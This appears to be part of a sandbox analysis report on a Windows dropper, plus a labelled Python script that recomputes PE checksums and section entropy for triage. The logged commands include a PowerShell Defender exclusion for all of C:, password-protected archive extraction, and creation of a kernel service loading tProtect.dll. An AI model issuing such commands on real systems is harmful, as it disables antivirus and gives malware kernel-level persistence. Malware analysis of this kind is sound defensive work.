Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmp | Process created: C:\Users\user\Desktop\yvaKqhmD4L.exe "C:\Users\user\Desktop\yvaKqhmD4L.exe" /VERYSILENT
Source: C:\Users\user\Desktop\yvaKqhmD4L.exe | Process created: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmp "C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmp" /SL5="$A022E,5790671,845824,C:\Users\user\Desktop\yvaKqhmD4L.exe" /VERYSILENT
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmp | Process created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmp | Process created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar (26 occurrences)
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar (19 occurrences)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar (3 occurrences)
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar (2 occurrences)
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 (12 occurrences)
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 (8 occurrences)
Source: C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmp | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmp | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\yvaKqhmD4L.exe | Process created: C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmp "C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmp" /SL5="$20432,5790671,845824,C:\Users\user\Desktop\yvaKqhmD4L.exe"
Source: C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmp | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmp | Process created: C:\Users\user\Desktop\yvaKqhmD4L.exe "C:\Users\user\Desktop\yvaKqhmD4L.exe" /VERYSILENT
Source: C:\Users\user\Desktop\yvaKqhmD4L.exe | Process created: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmp "C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmp" /SL5="$A022E,5790671,845824,C:\Users\user\Desktop\yvaKqhmD4L.exe" /VERYSILENT
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmp | Process created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmp | Process created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmp | Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar (31 occurrences)
Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
Source: C:\Users\user\Desktop\yvaKqhmD4L.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\yvaKqhmD4L.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmpSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmpSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmpSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmpSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmpSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmpSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmpSection loaded: winsta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmpSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmpSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmpSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmpSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmpSection loaded: shfolder.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmpSection loaded: rstrtmgr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmpSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmpSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmpSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmpSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmpSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmpSection loaded: edputil.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmpSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmpSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmpSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmpSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmpSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmpSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmpSection loaded: appresolver.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmpSection loaded: bcp47langs.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmpSection loaded: slc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmpSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmpSection loaded: sppc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmpSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmpSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\Desktop\yvaKqhmD4L.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\yvaKqhmD4L.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpSection loaded: winsta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpSection loaded: shfolder.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpSection loaded: rstrtmgr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpSection loaded: textshaping.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpSection loaded: dwmapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpSection loaded: sfc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpSection loaded: sfc_os.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpSection loaded: explorerframe.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpWindow found: window name: TMainFormJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: yvaKqhmD4L.exeStatic file information: File size 6745048 > 1048576
Source: yvaKqhmD4L.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: c:\builddir\threat~1.26\drivers\tfsysmon\objfre_wnet_amd64\amd64\TfSysMon.pdb source: 7zr.exe, 0000000C.00000003.1793648038.0000000000CD0000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe, 0000000C.00000003.1793459655.0000000003590000.00000004.00001000.00020000.00000000.sdmp, tProtect.dll.12.dr
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00D757D0 GetCurrentProcessId,GetCurrentThreadId,LoadLibraryW,GetProcAddress,FreeLibrary,GetTickCount,QueryPerformanceCounter,GetTickCount,10_2_00D757D0
Source: yvaKqhmD4L.tmp.0.drStatic PE information: real checksum: 0x0 should be: 0x343825
Source: update.vbc.6.drStatic PE information: real checksum: 0x0 should be: 0x3789ec
Source: yvaKqhmD4L.tmp.5.drStatic PE information: real checksum: 0x0 should be: 0x343825
Source: update.vbc.1.drStatic PE information: real checksum: 0x0 should be: 0x3789ec
Source: yvaKqhmD4L.exeStatic PE information: real checksum: 0x0 should be: 0x673fbf
Source: hrsw.vbc.6.drStatic PE information: real checksum: 0x0 should be: 0x3789ec
Source: tProtect.dll.12.drStatic PE information: real checksum: 0x1eb0f should be: 0xfc66
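
Added example, not part of the Joe Sandbox report and not code from the sample: the checksum findings above compare the CheckSum field stored in IMAGE_OPTIONAL_HEADER ("real checksum") with the value recomputed from the file contents ("should be"). A stored value of 0 only means the linker did not write one, which is common for user-mode binaries (the is-*.tmp and _isetup\_setup64.tmp paths in this report are Inno Setup's, whose Delphi-built stubs carry the .didata section listed below) and is weak evidence by itself; a non-zero value that disagrees with the contents, as for tProtect.dll.12.dr (0x1eb0f stored, 0xfc66 computed), means the file was modified after it was linked. The script recomputes the checksum with the arithmetic CheckSumMappedFile uses (32-bit sum over every dword except the CheckSum field, with end-around carry, folded to 16 bits, plus the file length) and, because the section findings further down flag a section named .aQ# with entropy 7.19, also lists sections whose name is not one a compiler normally emits or whose entropy exceeds 7.0. It runs on a minimal PE32+ image constructed inside the script (a zero-filled .text and an .aQ# section of uniformly distributed bytes, so its entropy is exactly 8.0); the set of known section names and the 7.0 threshold are assumptions.

```python
"""Recompute a PE file's header CheckSum and score its sections by entropy.
Added example (stdlib only); the PE image it analyses is constructed below."""
import math
import struct

# Assumption: names emitted by common linkers (MSVC, Delphi); anything else gets listed.
KNOWN_SECTIONS = {".text", ".rdata", ".data", ".pdata", ".idata", ".edata", ".rsrc",
                  ".reloc", ".tls", ".bss", ".didata", ".00cfg", ".voltbl", ".gfids"}
ENTROPY_THRESHOLD = 7.0  # assumption; compressed or encrypted data sits close to 8.0


def pe_checksum(data: bytes, checksum_offset: int) -> int:
    """Same arithmetic as imagehlp CheckSumMappedFile: sum every dword except the
    CheckSum field with end-around carry, fold to 16 bits, add the file length."""
    padded = data + b"\0" * (-len(data) % 4)
    skip = checksum_offset & ~3
    total = 0
    for off in range(0, len(padded), 4):
        if off == skip:
            continue
        total += int.from_bytes(padded[off:off + 4], "little")
        if total > 0xFFFFFFFF:
            total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total += total >> 16
    return (total & 0xFFFF) + len(data)


def shannon_entropy(buf: bytes) -> float:
    """Bits per byte: 0.0 for constant data, 8.0 for uniformly distributed bytes."""
    if not buf:
        return 0.0
    n = len(buf)
    counts = [0] * 256
    for b in buf:
        counts[b] += 1
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_pe(data: bytes):
    """Return (checksum_field_offset, stored_checksum, [(section_name, raw_bytes), ...])."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    num_sections = struct.unpack_from("<H", data, coff + 2)[0]
    size_of_optional = struct.unpack_from("<H", data, coff + 16)[0]
    optional = coff + 20
    checksum_off = optional + 64  # same offset in PE32 and PE32+ optional headers
    stored = struct.unpack_from("<I", data, checksum_off)[0]
    sections = []
    for i in range(num_sections):
        hdr = optional + size_of_optional + i * 40
        name = data[hdr:hdr + 8].rstrip(b"\0").decode("ascii", "replace")
        raw_size, raw_ptr = struct.unpack_from("<II", data, hdr + 16)
        sections.append((name, data[raw_ptr:raw_ptr + raw_size]))
    return checksum_off, stored, sections


def triage(data: bytes) -> dict:
    """Reproduce the two static findings: checksum mismatch and unusual sections."""
    checksum_off, stored, sections = parse_pe(data)
    computed = pe_checksum(data, checksum_off)
    suspicious = []
    for name, raw in sections:
        ent = shannon_entropy(raw)
        if name not in KNOWN_SECTIONS or ent > ENTROPY_THRESHOLD:
            suspicious.append((name, round(ent, 3)))
    return {"header_checksum": stored, "computed_checksum": computed,
            "checksum_matches": stored == computed, "suspicious_sections": suspicious}


def build_demo_pe() -> bytes:
    """Constructed minimal PE32+ (not a real sample): CheckSum left at 0, a zero-filled
    .text, and a section named .aQ# whose bytes are uniformly distributed."""
    text = b"\0" * 0x200
    packed = bytes(range(256)) * 16
    e_lfanew = 0x80
    header = bytearray(0x400)
    header[:2] = b"MZ"
    struct.pack_into("<I", header, 0x3C, e_lfanew)
    header[e_lfanew:e_lfanew + 4] = b"PE\0\0"
    coff = e_lfanew + 4
    # Machine AMD64, 2 sections, SizeOfOptionalHeader 240, EXECUTABLE_IMAGE|LARGE_ADDRESS_AWARE
    struct.pack_into("<HHIIIHH", header, coff, 0x8664, 2, 0, 0, 0, 240, 0x22)
    optional = coff + 20
    struct.pack_into("<H", header, optional, 0x20B)  # PE32+ magic; CheckSum at +64 stays 0
    for i, (name, raw, raw_ptr) in enumerate(((b".text", text, 0x400), (b".aQ#", packed, 0x600))):
        struct.pack_into("<8sIIII", header, optional + 240 + i * 40,
                         name, len(raw), 0x1000 * (i + 1), len(raw), raw_ptr)
    return bytes(header) + text + packed


if __name__ == "__main__":
    result = triage(build_demo_pe())
    print(f"real checksum: {result['header_checksum']:#x} should be: {result['computed_checksum']:#x}")
    print("suspicious sections:", result["suspicious_sections"])
```

Pointing triage() at the bytes of a dropped file reproduces the report's "real checksum ... should be" pair; a stored value that is non-zero and wrong is the one worth following up, since linkers write a correct value when they write one at all. The entropy rule is a prompt to look, not a verdict: resource sections with embedded images and legitimately compressed installers also score high.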
Source: yvaKqhmD4L.exeStatic PE information: section name: .didata
Source: yvaKqhmD4L.tmp.0.drStatic PE information: section name: .didata
Source: update.vbc.1.drStatic PE information: section name: .00cfg
Source: update.vbc.1.drStatic PE information: section name: .voltbl
Source: update.vbc.1.drStatic PE information: section name: .aQ#
Source: yvaKqhmD4L.tmp.5.drStatic PE information: section name: .didata
Source: 7zr.exe.6.drStatic PE information: section name: .sxdata
Source: update.vbc.6.drStatic PE information: section name: .00cfg
Source: update.vbc.6.drStatic PE information: section name: .voltbl
Source: update.vbc.6.drStatic PE information: section name: .aQ#
Source: hrsw.vbc.6.drStatic PE information: section name: .00cfg
Source: hrsw.vbc.6.drStatic PE information: section name: .voltbl
Source: hrsw.vbc.6.drStatic PE information: section name: .aQ#
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpCode function: 6_2_6C1FBDDB push ecx; ret 6_2_6C1FBDEE
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpCode function: 6_2_6C0A0F00 push ss; retn 0001h6_2_6C0A0F0A
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpCode function: 6_2_6C2C9F10 push eax; ret 6_2_6C2C9F2E
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpCode function: 6_2_6C22E9F4 push 004AC35Ch; ret 6_2_6C22EA0E
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpCode function: 6_2_6C2CA290 push eax; ret 6_2_6C2CA2BE
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00CF45F4 push 00D9C35Ch; ret 10_2_00CF460E
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00D8FB10 push eax; ret 10_2_00D8FB2E
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00D8FE90 push eax; ret 10_2_00D8FEBE
Source: update.vbc.1.drStatic PE information: section name: .aQ# entropy: 7.189081398239323
Source: update.vbc.6.drStatic PE information: section name: .aQ# entropy: 7.189081398239323
Source: hrsw.vbc.6.drStatic PE information: section name: .aQ# entropy: 7.189081398239323
Source: C:\Users\user\Desktop\yvaKqhmD4L.exeFile created: C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmpJump to dropped file
Source: C:\Users\user\Desktop\yvaKqhmD4L.exeFile created: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpJump to dropped file
